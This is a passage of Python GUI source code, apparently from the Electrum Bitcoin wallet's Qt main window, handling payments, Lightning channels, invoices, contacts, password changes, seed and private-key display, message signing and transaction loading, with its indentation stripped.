except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
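# Returns a make_tx closure for channel funding; ConfirmTxDialog calls it with different fee estimates.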
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
            outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
                f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
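        # wrap each command so that console calls run against this wallet and can prompt for a password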
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
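            # one stacked page of keystore details per cosigner; the chooser below switches pages when there are several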
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
        if not self.question(_('Import channel backup?')):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
